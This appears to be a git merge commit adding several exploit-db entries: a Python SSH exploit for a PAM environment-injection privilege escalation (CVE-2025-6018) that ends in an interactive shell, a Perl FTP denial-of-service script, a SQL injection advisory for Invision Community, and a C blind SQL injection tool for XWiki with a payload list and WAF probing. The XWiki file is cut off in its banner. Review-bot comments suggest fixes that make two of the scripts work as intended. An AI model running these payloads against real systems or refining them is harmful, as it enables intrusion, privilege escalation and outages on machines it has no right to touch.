Merge remote-tracking branch 'exploitdb/main'

This commit is contained in:
Brendan McDevitt 2025-07-30 00:02:12 +00:00
commit c6207468e2
7 changed files with 1284 additions and 0 deletions

293
exploits/linux/local/52386.py Executable file

@ -0,0 +1,293 @@
# Exploit Title: Linux PAM Environment - Variable Injection Local Privilege Escalation
# Exploit Author: @İbrahimsql
# Exploit Author's github: https://github.com/ibrahmsql
# Description: PAM pam_env.so module allows environment variable injection via ~/.pam_environment
# leading to privilege escalation through SystemD session manipulation
# CVE: CVE-2025-6018, CVE-2025-6019
# Vendor Homepage: https://github.com/linux-pam/linux-pam
# Software Link: https://github.com/linux-pam/linux-pam/releases
# Version: PAM 1.3.0 - 1.6.0 (vulnerable versions)
# Category: Local Privilege Escalation
# Requirements: paramiko>=2.12.0
# Usage: python3 cve_2025_6018_professional.py -i target_ip -u username -p password
# References:
# - https://access.redhat.com/security/cve/CVE-2025-6018
# - https://bugzilla.redhat.com/show_bug.cgi?id=2372693
# - https://bugzilla.suse.com/show_bug.cgi?id=1243226
import paramiko
import time
import sys
import socket
import argparse
import logging
from datetime import datetime
# Setup logging
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s [%(levelname)s] %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
handlers=[
logging.FileHandler('cve_2025_6018_exploit.log'),
logging.StreamHandler(sys.stdout)
]
)
logger = logging.getLogger(__name__)
class CVEExploit:
def __init__(self):
self.vulnerable_versions = [
"pam-1.3.0", "pam-1.3.1", "pam-1.4.0", "pam-1.5.0",
"pam-1.5.1", "pam-1.5.2", "pam-1.5.3", "pam-1.6.0"
]
def check_vulnerability(self, client):
"""Enhanced vulnerability detection"""
logger.info("Starting vulnerability assessment")
checks = {
"pam_version": "rpm -q pam || dpkg -l | grep libpam",
"pam_env": "find /etc/pam.d/ -name '*' -exec grep -l 'pam_env' {} \\; 2>/dev/null",
"pam_systemd": "find /etc/pam.d/ -name '*' -exec grep -l 'pam_systemd' {} \\; 2>/dev/null",
"systemd_version": "systemctl --version | head -1"
}
vulnerable = False
for check_name, command in checks.items():
logger.info(f"Executing check: {check_name}")
try:
stdin, stdout, stderr = client.exec_command(command, timeout=10)
output = stdout.read().decode().strip()
if check_name == "pam_version":
for vuln_ver in self.vulnerable_versions:
if vuln_ver in output:
logger.info(f"Vulnerable PAM version detected: {vuln_ver}")
vulnerable = True
break
elif check_name == "pam_env" and output:
logger.info("pam_env.so configuration found")
vulnerable = True
elif check_name == "pam_systemd" and output:
logger.info("pam_systemd.so found - escalation vector available")
if output and check_name != "pam_version":
logger.debug(f"Command output: {output[:100]}...")
except Exception as e:
logger.warning(f"Check {check_name} failed: {e}")
time.sleep(0.5)
return vulnerable
def create_malicious_environment(self, client):
"""Create enhanced .pam_environment file"""
logger.info("Creating malicious environment file")
payload = '''# CVE-2025-6018 Environment Poisoning
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
XDG_SESSION_TYPE OVERRIDE=x11
XDG_SESSION_CLASS OVERRIDE=user
XDG_RUNTIME_DIR OVERRIDE=/tmp/runtime
SYSTEMD_LOG_LEVEL OVERRIDE=debug'''
try:
logger.info("Writing .pam_environment file")
cmd = f"cat > ~/.pam_environment << 'EOF'\n{payload}\nEOF"
stdin, stdout, stderr = client.exec_command(cmd)
# Verify creation
stdin, stdout, stderr = client.exec_command("cat ~/.pam_environment")
output = stdout.read().decode()
if "OVERRIDE" in output:
logger.info("Malicious environment file created successfully")
return True
else:
logger.error("Failed to create environment file")
return False
except Exception as e:
logger.error(f"Environment poisoning failed: {e}")
return False
def test_privilege_escalation(self, client):
"""Test privilege escalation vectors"""
logger.info("Testing privilege escalation vectors")
tests = [
("SystemD Reboot", "gdbus call --system --dest org.freedesktop.login1 --object-path /org/freedesktop/login1 --method org.freedesktop.login1.Manager.CanReboot", "yes"),
("SystemD Shutdown", "gdbus call --system --dest org.freedesktop.login1 --object-path /org/freedesktop/login1 --method org.freedesktop.login1.Manager.CanPowerOff", "yes"),
("PolicyKit Check", "pkcheck --action-id org.freedesktop.policykit.exec --process $$ 2>/dev/null || echo 'denied'", "authorized")
]
escalated = False
for test_name, command, success_indicator in tests:
logger.info(f"Testing: {test_name}")
try:
stdin, stdout, stderr = client.exec_command(command, timeout=10)
output = stdout.read().decode().strip()
if success_indicator in output.lower():
logger.info(f"PRIVILEGE ESCALATION DETECTED: {test_name}")
escalated = True
else:
logger.info(f"No escalation detected: {test_name}")
except Exception as e:
logger.warning(f"Test {test_name} failed: {e}")
return escalated
def interactive_shell(self, client):
"""Professional interactive shell"""
logger.info("Starting interactive shell session")
shell = client.invoke_shell()
shell.send("export PS1='exploit$ '\n")
time.sleep(1)
# Clear buffer
while shell.recv_ready():
shell.recv(1024)
print("\n--- Interactive Shell ---")
print("Commands: 'exit' to quit, 'status' for privilege check")
while True:
try:
command = input("exploit$ ")
if command.lower() == 'exit':
break
elif command.lower() == 'status':
stdin, stdout, stderr = client.exec_command("id && groups")
print(stdout.read().decode())
continue
shell.send(command + "\n")
time.sleep(0.5)
while shell.recv_ready():
output = shell.recv(1024).decode('utf-8', errors='ignore')
print(output, end='')
except KeyboardInterrupt:
logger.warning("Use 'exit' to quit properly")
except Exception as e:
logger.error(f"Shell error: {e}")
break
def run_exploit(self, hostname, username, password=None, key_filename=None, port=22):
"""Main exploit execution"""
logger.info(f"Starting CVE-2025-6018 exploit against {hostname}:{port}")
try:
# Initial connection
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
logger.info(f"Connecting to {hostname}:{port} as {username}")
client.connect(hostname, port=port, username=username,
password=password, key_filename=key_filename, timeout=10)
logger.info("SSH connection established")
# Check vulnerability
if not self.check_vulnerability(client):
logger.error("Target does not appear vulnerable to CVE-2025-6018/6019")
return False
logger.info("Target appears vulnerable, proceeding with exploitation")
# Create malicious environment
if not self.create_malicious_environment(client):
logger.error("Failed to create malicious environment")
return False
logger.info("Reconnecting to trigger PAM environment loading")
client.close()
time.sleep(2)
# Reconnect to trigger PAM
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(hostname, port=port, username=username,
password=password, key_filename=key_filename)
logger.info("Reconnection successful")
# Test privilege escalation
if self.test_privilege_escalation(client):
logger.info("EXPLOITATION SUCCESSFUL - Privilege escalation confirmed")
self.interactive_shell(client)
else:
logger.warning("No clear privilege escalation detected")
logger.info("Manual verification may be required")
return True
except paramiko.AuthenticationException:
logger.error("Authentication failed - check credentials")
except paramiko.SSHException as e:
logger.error(f"SSH error: {e}")
except socket.error as e:
logger.error(f"Network error: {e}")
except Exception as e:
logger.error(f"Unexpected error: {e}")
finally:
try:
client.close()
except:
pass
logger.info("Connection closed")
return False
def main():
parser = argparse.ArgumentParser(
description="CVE-2025-6018/6019 PAM Environment Injection Exploit",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
python3 %(prog)s -i 192.168.1.100 -u testuser -p password123
python3 %(prog)s -i target.com -u admin -k ~/.ssh/id_rsa
"""
)
parser.add_argument("-i", "--hostname", required=True, help="Target hostname or IP")
parser.add_argument("-u", "--username", required=True, help="SSH username")
parser.add_argument("-p", "--password", help="SSH password")
parser.add_argument("-k", "--key", dest="key_filename", help="SSH private key file")
parser.add_argument("--port", type=int, default=22, help="SSH port (default: 22)")
parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose logging")
args = parser.parse_args()
if args.verbose:
logging.getLogger().setLevel(logging.DEBUG)
if not args.password and not args.key_filename:
parser.error("Provide either password (-p) or private key (-k)")
# Security warning
logger.warning("Use only with proper authorization!")
exploit = CVEExploit()
success = exploit.run_exploit(
hostname=args.hostname,
username=args.username,
password=args.password,
key_filename=args.key_filename,
port=args.port
)
sys.exit(0 if success else 1)
if __name__ == "__main__":
main()
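Review bot: `run_exploit` can never report success, because the `return False` placed inside the `finally` block runs after the `return True` at the end of the `try` body and replaces it, and it also discards any exception raised in the `except` handlers, so `main` always exits with status 1. Dedent that line one level so it sits after the `finally` block (`    return False` at function-body level, reached only when an `except` branch ran). The cleanup also relies on a bare `except:` to absorb a `NameError` when `paramiko.SSHClient()` itself failed; initialise `client = None` before the `try` and narrow it to `except Exception:`. Separately, `set_missing_host_key_policy(paramiko.AutoAddPolicy())` on both connections accepts whatever host key is presented, so the tool hands the supplied credentials to any host that answers on that port; `client.load_system_host_keys()` with `paramiko.RejectPolicy()` is the safer default for a credential-bearing client.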


@ -0,0 +1,66 @@
# Exploit Title: Xlight FTP 1.1 - Denial Of Service (DOS)
# Google Dork: N/A
# Date: 22 July 2025
# Exploit Author: Fernando Mengali
# LinkedIn: https://www.linkedin.com/in/fernando-mengali/
# Vendor Homepage: https://www.xlightftpd.com
# Software Link: N/A
# Version: 1.1
# Tested on: Windows XP
# CVE: CVE-2024-0737
$sis="$^O";
if ($sis eq "windows"){
$cmd="cls";
} else {
$cmd="clear";
}
system("$cmd");
intro();
main();
print "[+] Exploiting... \n";
my $payload = "\x41"x500;
my $ftp = Net::FTP->new($ip, Debug => 0) or die "Não foi possível se conectar ao servidor: $@";
$ftp->login($payload,"anonymous") or die "[+] Possibly exploited!";
$ftp->quit;
print "[+] Done - Exploited success!!!!!\n\n";
sub intro {
print q {
,--,
_ ___/ /\|
,;'( )__, ) ~
// // '--;
' \ | ^
^ ^
[+] LightFTP 1.1 - Denial of Service (DoS)
[*] Coded by Fernando Mengali
[@] e-mail: fernando.mengalli@gmail.com
}
}
sub main {
our ($ip, $port) = @ARGV;
unless (defined($ip) && defined($port)) {
print " \nUsage: $0 <ip> <port> \n";
exit(-1);
}
}
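Review bot: The platform check `if ($sis eq "windows")` never matches, because `$^O` reports `MSWin32` on Windows, so the screen is always cleared with `clear`; compare with `if ($sis eq "MSWin32")`. The banner in `intro` names the product `LightFTP 1.1` while the header says `Xlight FTP 1.1`, and `main` insists on a `<port>` argument that nothing reads afterwards, so the usage text promises a parameter the script ignores; header, banner and usage text should agree.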


@ -0,0 +1,44 @@
# Exploit Title: Invision Community <= 4.7.20 (calendar/view.php) - SQL Injection
# Google Dork: N/A
# Date: 23 July 2025
# Exploit Author: Egidio Romano
# LinkedIn: N/A
# Vendor Homepage: https://invisioncommunity.com
# Software Link: https://invisioncommunity.com
# Version: Certain 4.x versions before 4.7.21
# Tested on: Invision Community <= 4.7.20
# CVE: CVE-2025-48932
## Vulnerability Description
The vulnerability is located within the `/applications/calendar/modules/front/calendar/view.php` script. Specifically, in the `IPS\calendar\modules\front\calendar\view::search()` method, user input passed through the `location` request parameter is not properly sanitized before being used to construct a SQL query. This can be exploited by remote, unauthenticated attackers to, for example, read sensitive data from the database through boolean-based SQL Injection attacks. Successful exploitation of this vulnerability requires the "calendar" application to be installed and a "GeoLocation feature" (like Google Maps) to be configured.
**NOTE:** SQL Injection vulnerabilities in Invision Community 4.x might lead to admin account takeover and RCE attacks, by resetting the admin's password. However, starting from version 4.7.18, a new security encryption key has been introduced within the password reset mechanism. As such, this attack vector won't work anymore with versions >= 4.7.18.
## Proof of Concept
https://karmainsecurity.com/pocs/CVE-2025-48932.php
## Solution
Upgrade to version 4.7.21 or later.
## Disclosure Timeline
- [16/05/2025] - Vendor notified
- [27/05/2025] - Version 4.7.21 released
- [28/05/2025] - CVE identifier requested
- [28/05/2025] - CVE identifier assigned
- [23/07/2025] - Public disclosure
## CVE Reference
The Common Vulnerabilities and Exposures program (cve.org) has assigned the name CVE-2025-48932 to this vulnerability.
## Credits
Vulnerability discovered by Egidio Romano.
## Original Advisory
http://karmainsecurity.com/KIS-2025-06


@ -0,0 +1,674 @@
# Exploit Title: XWiki 14 - SQL Injection via getdeleteddocuments.vm
# Google Dork: N/A
# Date: 28 July 2025
# Exploit Author: Byte Reaper
# LinkedIn: N/A
# Vendor Homepage: https://www.xwiki.org
# Software Link: https://www.xwiki.org
# Version: XWiki Platform ≤ 14.x
# Tested on: XWiki Platform ≤ 14.x
# CVE: CVE-2025-32429
## Vulnerability Description
A blind SQL Injection vulnerability exists in the XWiki Platforms `getdeleteddocuments.vm` template, specifically via the `sort` parameter. The vulnerability can be exploited by sending a crafted payload to the following REST endpoint:
```
/xwiki/rest/liveData/sources/liveTable/entries?sourceParams.template=getdeleteddocuments.vm&sort=<PAYLOAD>
```
An attacker can inject arbitrary SQL statements into the underlying database query, resulting in data exfiltration, authentication bypass, or denial of service. The vulnerability was verified on XWiki Platform versions up to 14.x using a C-based curl exploit.
## Steps to Reproduce
1. Save the provided `exploit.c` file to your local environment.
2. Compile the PoC:
```
gcc -o exploit exploit.c argparse.c -lcurl
```
3. Execute against a vulnerable instance:
```
./exploit -u http://victim.example.com/xwiki
```
4. Observe response delays or injected content indicating successful SQL execution.
## Proof of Concept
- GitHub PoC: https://github.com/byteReaper77/CVE-2025-32429/blob/main/exploit.c
/*
* Author : Byte Reaper
* Telegram : @ByteReaper0
* CVE : CVE-2025-32429
* Vulnerability: SQL Injection
* Description : A vulnerability in the xwiki platform using the sort operator in the getdeletedocuments.v file, which leads to injecting malicious SQL statements into the sort= parameter.
* ------------------------------------------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
#include <string.h>
#include <curl/curl.h>
#include "argparse.h"
#include <time.h>
#include <stdlib.h>
#include <unistd.h>
#define URL 2500
const char *yourUrl = NULL;
int verbose = 0;
int selecetCookie = 0;
const char *cookies = NULL;
void exitAssembly()
{
__asm__ volatile
(
"xor %%rdi, %%rdi\n\t"
"mov $231, %%rax\n\t"
"syscall\n\t"
:
:
: "rax",
"rdi"
);
}
struct Mem
{
char *buffer;
size_t len;
};
size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)
{
size_t total = size * nmemb;
struct Mem *m = (struct Mem *)userdata;
char *tmp = realloc(m->buffer, m->len + total + 1);
if (tmp == NULL)
{
printf("\e[1;31m[-] Failed to allocate memory!\e[0m\n");
exitAssembly();
}
m->buffer = tmp;
memcpy(&(m->buffer[m->len]), ptr, total);
m->len += total;
m->buffer[m->len] = '\0';
return total;
}
const char *payload[] =
{
"' OR '1",
" ' OR 1 -- -",
" OR "" = ",
"\" OR 1 = 1 -- -",
",(select * from (select(sleep(5)))a)",
"%2c(select%20*%20from%20(select(sleep(5)))a)",
"';WAITFOR DELAY '0:0:05'--",
"AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='",
"AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)",
"AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--",
"AS INJECTX WHERE 1=1 AND 1=0--",
"WHERE 1=1 AND 1=1"
};
const char *word[] =
{
"select",
"union",
"insert",
"update",
"delete",
"drop",
"create",
"alter",
"truncate",
"replace",
"or",
"and",
"not",
"1=1",
"1=0",
"--",
"#",
"/*",
"*/",
"sleep",
"benchmark",
"load_file",
"outfile",
"error",
"warning",
"mysql",
"pg_",
"exec",
"xp_",
"admin",
"root",
""
};
int numberPayload = sizeof(payload) / sizeof(payload[0]);
int numberWord = sizeof(word) / sizeof(word[0]);
char full[URL];
void injection(const char *baseUrl)
{
CURLcode res ;
CURL *curl = curl_easy_init();
struct Mem response =
{
NULL,
0
};
if (curl == NULL)
{
printf("\e[1;31m[-] Error Create Object Curl !\e[0m\n");
printf("\e[1;31m[-] Check Your Connection (Ping)...\e[0m\n");
printf("\e[1;31m[-] Command : ping google.com\n");
const char *pingCommand = "/bin/ping";
const char *argv[] = {"ping", "-c", "5", "google.com", NULL};
const char *envp[] = {NULL};
__asm__ volatile
(
"mov %[argv], %%rsi\n\t"
"mov $59, %%rax\n\t"
"mov %[envp], %%rdx\n\t"
"mov %[command], %%rdi\n\t"
"syscall\n\t"
"cmp $0, %%rax\n\t"
"jl exitSyscall\n\t"
"exitSyscall:\n\t"
"mov $0x3C, %%rax\n\t"
"xor %%rdi, %%rdi\n\t"
"syscall\n\t"
".2:\n\t"
:
: [argv] "r" (argv),
[envp] "r" (envp),
[command] "r" (pingCommand)
: "rax",
"rdi",
"rsi",
"rdx"
);
}
response.buffer = NULL;
response.len = 0;
if (verbose)
{
printf("\e[1;35m==========================================\e[0m\n");
printf("\e[1;33m[+] Cleaning Response...\e[0m\n");
printf("\e[1;33m[+] Response Buffer : %s\e[0m\n",response.buffer);
printf("\e[1;33m[+] Response Len : %d\e[0m\n",response.len);
printf("\e[1;35m==========================================\e[0m\n");
}
if (curl)
{
int n = 0;
for (int p = 0; p < numberPayload; p++)
{
char *encodePayload = curl_easy_escape(curl,
payload[p],
0);
if (!encodePayload)
{
printf("\e[1;31m[-] Error Encode Payload !\e[0m\n");
exitAssembly();
}
snprintf(full,
sizeof(full),
"%s/xwiki/rest/liveData/sources/liveTable/entries?sourceParams.template=getdeleteddocuments.vm&sort=%s",
baseUrl,
encodePayload);
printf("\e[1;34m[+] Encode Payload Successfully.\e[0m\n");
printf("\e[1;34m[+] Payload Encode : %s\e[0m\n", encodePayload);
curl_easy_setopt(curl,
CURLOPT_URL,
full);
struct timespec ts;
ts.tv_sec = 0;
ts.tv_nsec = 10000000;
printf("\e[1;34m[+] sys_nanosleep syscall (10000000)...\e[0m\n");
__asm__ volatile
(
"mov $35, %%rax\n\t"
"mov %[ts], %%rdi\n\t"
"xor %%rsi, %%rsi\n\t"
"syscall\n\t"
:
: [ts] "r" (&ts)
:"rax", "rdi", "rsi"
);
if (selecetCookie)
{
curl_easy_setopt(curl,
CURLOPT_COOKIEFILE,
cookies);
curl_easy_setopt(curl,
CURLOPT_COOKIEJAR,
cookies);
}
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
if (verbose)
{
printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n");
curl_easy_setopt(curl,
CURLOPT_VERBOSE,
1L);
}
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
&response);
curl_easy_setopt(curl,
CURLOPT_CONNECTTIMEOUT,
5L);
curl_easy_setopt(curl,
CURLOPT_TIMEOUT,
10L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYPEER,
0L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYHOST,
0L);
struct curl_slist *headers = NULL;
headers = curl_slist_append(headers,
"Accept-Language: en-US,en");
headers = curl_slist_append(headers,
"Connection: keep-alive");
headers = curl_slist_append(headers,
"Referer: http://example.com");
double delayTime;
clock_t start = clock();
res = curl_easy_perform(curl);
printf("\e[1;34m+] Payload : %s\e[0m\n", payload[p]);
printf("\e[1;34m[+] Encode Payload %s\e[0m\n", encodePayload);
printf("\e[1;32m[*] PID : %d\e[0m\n", getpid());
curl_free(encodePayload);
curl_slist_free_all(headers);
usleep(1000000);
if (res == CURLE_OK)
{
printf("-----------------------------------------------------------------\n");
long httpCode = 0;
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&httpCode);
curl_easy_getinfo(curl,
CURLINFO_TOTAL_TIME,
&delayTime);
printf("\e[1;36m[+] Request sent successfully\e[0m\n");
printf("\e[1;34m[+] Delay Time Response : %f\e[0m\n",
delayTime);
printf("\e[1;37m[+] Input Url : %s\e[0m\n",
baseUrl);
printf("\e[1;37m[+] Full Url : %s\e[0m\n",
full);
printf("\e[1;32m[+] Http Code -> %ld\e[0m\n", httpCode);
if (httpCode >= 200 && httpCode < 300)
{
clock_t end = clock();
double timeInjection = (double) (end - start )/ CLOCKS_PER_SEC;
printf("\e[1;36m[+] Positive Http Code (200 < 300) : %ld\n",httpCode);
for (int w = 0; w < numberWord; w++)
{
if (strstr(response.buffer, word[w]) != NULL)
{
printf("\e[1;34m[+] A suspicious word was found in the server's response !!\e[0m\n");
printf("\e[1;34m[+] Word Found : %s\e[0m\n", word[w]);
printf("[+] The vulnerability CVE-2025-32429 exists on the server\e[0m\n");
printf("\e[1;37m\n======================================== [Response Server] ========================================\e[0m\n");
printf("%s\n", response.buffer);
printf("\e[1;32m[Len] : %d\e[0m\n", response.len);
printf("\e[1;37m\n==================================================================================================\e[0m\n");
printf("[+] Check Timeout Response...\e[0m\n");
if (timeInjection >= 7.5)
{
printf("\e[1;34m[+] Possible SQL Executed (Delay Detected)\e[0m\n");
printf("\e[1;34m[+] The server is experiencing a vulnerability (CVE-2025-32429)\e[0m\n");
}
else
{
printf("\e[1;31m[-] No response delay detected !\e[0m\n");
}
}
else
{
printf("\e[1;31m[-] No suspicious words were found in the server response !\e[0m\n");
}
}
}
else
{
printf("\e[1;31m[-] HTTP Code Not Range Positive (200 < 300) : %ld\e[0m\n", httpCode);
printf("\e[1;34m[+] Try Next Payload : %s\e[0m\n", payload[p]);
}
}
else
{
printf("\e[1;31m[-] Error Send Request\e[0m\n");
printf("\e[1;31m[-] Error : %s\e[0m\n", curl_easy_strerror(res));
printf("\e[1;31m[-] Please Check Your Connection !\e[0m\n");
exitAssembly();
}
}
}
if (response.buffer)
{
free(response.buffer);
response.buffer = NULL;
response.len = 0;
}
curl_easy_cleanup(curl);
}
void checkWaf(const char *base)
{
printf("[+] Check Waf ============================================================\e[0m\n");
struct Mem response = {NULL, 0};
response.buffer = NULL;
response.len = 0;
int step1 = 0;
int step2= 0;
int step3 = 0;
int step4 = 0;
int step5 = 0;
if (verbose)
{
printf("\e[1;33m[+] Response Buffer Cleaning Successfully \e[0m\n");
printf("\e[1;33m[+] Response Buffer : %s\e[0m\n", response.buffer);
printf("\e[1;33m[+] Response Len : %zu\e[0m\n", response.len);
}
const char *keyWaf[] =
{
"Access Denied",
"Request blocked",
"Security violation",
"Your request looks suspicious"
};
int numberWaf = sizeof(keyWaf) / sizeof(keyWaf[0]);
printf("\e[1;34m[+] Base URL : %s\e[0m\n", base);
CURLcode res;
char fullWaf[URL];
snprintf(fullWaf, sizeof(fullWaf),
"%s/xwiki/rest/liveData/sources/liveTable/entries?sourceParams.template=getdeleteddocuments.vm&sort=''",
base);
printf("\e[1;34m[+] Full Url : %s\e[0m\n",fullWaf);
CURL *curl = curl_easy_init();
if (curl == NULL)
{
printf("\e[1;31m[-] Error: Could not initialize CURL.\e[0m\n");
exitAssembly();
}
curl_easy_setopt(curl,
CURLOPT_URL, fullWaf);
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
struct curl_slist *headers = NULL;
headers = curl_slist_append(headers,
"User-Agent: sqlmap");
curl_easy_setopt(curl,
CURLOPT_HTTPHEADER,
headers);
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
&response);
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
res = curl_easy_perform(curl);
double timeD = 0;
long code = 0;
long redirects = 0;
if (res == CURLE_OK)
{
curl_easy_getinfo(curl,
CURLINFO_REDIRECT_COUNT,
&redirects);
curl_easy_getinfo(curl,
CURLINFO_TOTAL_TIME,
&timeD);
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&code);
printf("\e[1;36m[+] Step 1: Check Number redirects\e[0m\n");
if (redirects > 1)
{
printf("\e[1;35m============= [ WAF DETECTED ] =============\e[0m\n");
printf("\e[1;34m[+] Suspicious number of redirects: %ld\e[0m\n", redirects);
printf("\e[1;35m============================================\e[0m\n");
step1 = 1;
}
else
{
printf("[-] Waf not detected (Number redirects)\e[0m\n");
}
printf("\e[1;34m[+] Request sent with simple payload ('')\e[0m\n");
printf("\e[1;35m[+] Step 2: Check HTTP Code\e[0m\n");
printf("\e[1;32m[+] HTTP Code: %ld\e[0m\n", code);
if (code == 403 ||
code == 404 ||
code == 503)
{
printf("\e[1;35m============= [ WAF DETECTED ] =============\e[0m\n");
printf("\e[1;34m[+] Blocking response code: %ld\e[0m\n", code);
printf("\e[1;34m[+] Page is likely filtered by WAF.\e[0m\n");
printf("\e[1;35m============================================\e[0m\n");
step2 = 1;
}
else
{
printf("\e[1;31m[-] No blocking HTTP code.\e[0m\n");
printf("\e[1;31m[-] WAF not detected based on HTTP code.\e[0m\n");
}
printf("[+] Step 3: Check Response Time\e[0m\n");
if (timeD >= 3.0)
{
printf("\e[1;35m============= [ WAF DETECTED ] =============\e[0m\n");
printf("\e[1;34m[+] Suspicious delay in response: %.2f sec\e[0m\n", timeD);
printf("\e[1;35m============================================\e[0m\n");
step3 = 1;
}
else
{
printf("\e[1;31m[-] Normal response time: %.2f sec\e[0m\n", timeD);
printf("\e[1;31m[-] WAF not detected based on delay.\e[0m\n");
}
printf("[+] Step 4: Check Response Content\e[0m\n");
for (int l = 0; l < numberWaf; l++)
{
if (response.buffer)
{
if (strstr(response.buffer, keyWaf[l]))
{
printf("\e[1;35m============= [ WAF DETECTED ] =============\e[0m\n");
printf("\e[1;34m[+] Word Found : %s\e[0m\n",keyWaf[l]);
printf("\e[1;34m[+] Waf Detected (Word Found In Response)\e[0m\n");
printf("\e[1;35m============================================\e[0m\n");
step4 = 1;
}
else
{
printf("\e[1;31m[-] Word Not Found : %s\e[0m\n", keyWaf[l]);
printf("\e[1;31m[-] WAF not detected (Not Found Word in response)\e[0m\n");
}
}
else
{
printf("\e[1;31m[-] Response Buffer is NULL !\n");
printf("\e[1;35m[+] Step 5 : Check Response Server (NULL + Http Code 200)\e[0m\n");
if (code == 200)
{
printf("\e[1;35m============= [ WAF DETECTED ] =============\e[0m\n");
printf("\e[1;32m[+] Http Code : %ld\n", code);
printf("\e[1;34m[+] Waf Detected (Response NULL And http Code 200)\e[0m\n");
if (verbose && response.buffer)
{
printf("\e[1;35m[+] Response Server : ==========================================\e[0m\n");
printf("%s\e[0m\n", response.buffer);
}
printf("\e[1;35m============================================\e[0m\n");
step5 = 1;
}
else
{
printf("\e[1;31m[-] Waf Not Detected (Http Code not 200 And buffer NULL)!\e[0m\n");
}
}
}
}
else
{
printf("[!] curl_easy_perform() failed: %s\e[0m\n", curl_easy_strerror(res));
}
printf("\e[1;35m[+] Step 6: Check Connection Reset\e[0m\n");
if (res == CURLE_RECV_ERROR)
{
printf("\e[1;35m============= [ WAF DETECTED ] =============\e[0m\n");
printf("\e[1;34m[+] Connection reset detected (CURLE_RECV_ERROR)\e[0m\n");
printf("\e[1;35m============================================\e[0m\n");
}
else
{
printf("\e[1;31m[-] No connection reset error.\e[0m\n");
}
curl_slist_free_all(headers);
curl_easy_cleanup(curl);
printf("\e[1;35m\n[+] Result Status Waf : \e[0m\n");
if (step1 || step2 || step3 || step4 || step5)
{
printf("\e[1;36m[=] Final Verdict: WAF Detected \e[0m\n");
}
else
{
printf("\e[1;31m[=] Final Verdict: No WAF Detected !\e[0m\n");
}
}
int main(int argc,
const char **argv)
{
printf
(
"⣦⠃⣿⣶⣶⣶⣶⣾⠀⠀⠀⠀⠀⠀⢀⡴⣲⠋⢁⡴⠋⠁⠀⣠⠶⠋⠁⠀⣠⢴⠆⠀⢠⠆⠀⢀⣠⢞⡓⠒⠀⠀⠉⠓⠲⢤⣀⠀⠀⠀⠀⠉⢧⡀⠀⠀⠀⠀⠀\n"
" ⠀⣿⣿⣿⣿⣿⠇⠀⠀⠀⣀⡤⠚⠁⡼⣣⡴⠋⠀⠀⢀⡞⠁⠀⠀⢀⣠⣿⡋⠀⣠⣿⠴⠚⣉⣉⠉⠉⠉⠛⠭⣟⠒⢤⣀⠈⠙⠦⢄⣀⠀⠈⢣⠀⠀⠀⠀⠀⠀⠀⠀⠀\n"
"⠀⣸⣿⣿⣿⣿⡟⠀⣴⠚⠉⠁⠀⢀⡾⠟⠉⠀⠀⣀⣴⡟⠀⠀⣠⣖⣋⢹⣿⢁⣾⣏⠠⢤⣀⡀⠉⠙⠆⠀⠀⠀⠈⠳⢤⡈⠳⣄⠀⠀⠉⠙⠶⣌⣳⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n"
"⠀⣿⣿⣿⣿⡿⠀⠀⠈⠛⣒⣒⡾⠋⠀⠀⢀⣤⣾⢫⠟⠀⠀⣸⠧⣄⠘⠳⢯⡉⠈⠉⠓⣄⠀⠉⠻⣍⠛⠲⣄⠀⠀⠀⠀⠙⢦⡈⠓⢄⠀⠀⠀⠀⠙⢷⡀⠀⠀⠀⠀⠀⠀⠀⠀\n"
"⡸⣿⣿⡹⢿⣃⣀⠴⠊⠉⣠⠎⠀⠀⢀⣶⣿⠾⡵⠋⠀⠀⡼⣡⠴⣦⣀⣀⠀⠉⠲⣄⠀⠈⢳⡀⠀⠀⠱⣄⠀⠙⢆⠀⠀⠀⠀⠙⢦⡀⠱⣄⠀⠀⠀⠀⠹⣌⣓⣶⢶⡦⠀⠀⠀\n"
"⢳⣿⣿⣿⣟⠟⠃⠀⣠⠞⠁⠀⠀⣤⠛⠛⢒⣾⢁⣴⣤⠞⢰⡇⢸⠋⢻⠈⣝⢦⡀⠈⠓⢄⠀⠱⡀⠀⠀⠈⠳⡀⠀⠳⣄⠀⠀⠀⠀⠙⢦⠈⠳⡀⠀⠲⣄⠈⢿⡄⠀⠀⠀⠀⠀\n"
"⣼⣿⣿⢟⣡⡴⣹⠟⢁⠀⢀⣠⠞⠉⣽⠯⠉⢉⣽⢿⣶⣤⢸⢁⠿⡀⢸⡇⢘⢦⢻⡳⣄⠀⠀⠀⠙⣆⠀⠀⠀⠙⢆⠀⠘⢦⡀⠀⠀⠀⠀⠁⠀⠀⠀⠀⠨⠵⣶⡄⠀⠀⠀⠀⠀\n"
"⣿⡿⣵⣿⠋⠺⢥⣴⣯⠞⡋⢀⣤⠞⣱⢯⣴⠏⢡⡏⠀⢿⠸⢸⡀⡇⠈⣧⠈⢾⢏⢧⡈⠓⢦⡀⠀⠙⢧⣀⠀⠀⠈⠳⣄⠀⢳⡀⠀⠀⠀⠀⠀⠀⠀⠀⠐⢺⣯⣽⣦⠀⠀⠀⠀\n"
